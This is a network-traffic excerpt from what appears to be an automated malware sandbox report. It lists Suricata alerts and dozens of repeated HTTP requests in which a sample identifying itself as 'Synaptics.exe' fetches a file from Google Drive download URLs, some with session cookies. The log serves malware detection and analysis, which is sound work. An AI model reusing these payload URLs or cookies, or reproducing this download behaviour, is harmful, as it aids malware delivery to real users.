                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49781 -> 13.107.246.45:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49816 -> 13.107.246.45:443
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=SEIp9Ft1pM_DTSp4ZWAE2JXd5p6vYnOenYasNDVud7Yu6_XlLVZWsdgqTMAV0WJp8gbHLzac7m-O074jzZozfmgMpTLCdPEbll-92cpDhan5otbZ5vTSOiiwCIw1pFCy9i0rkRERXyoZZbduoCGvMnLGpGFYBf-d6w_ZXbzQtTOeATiGU0dEJLQO
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
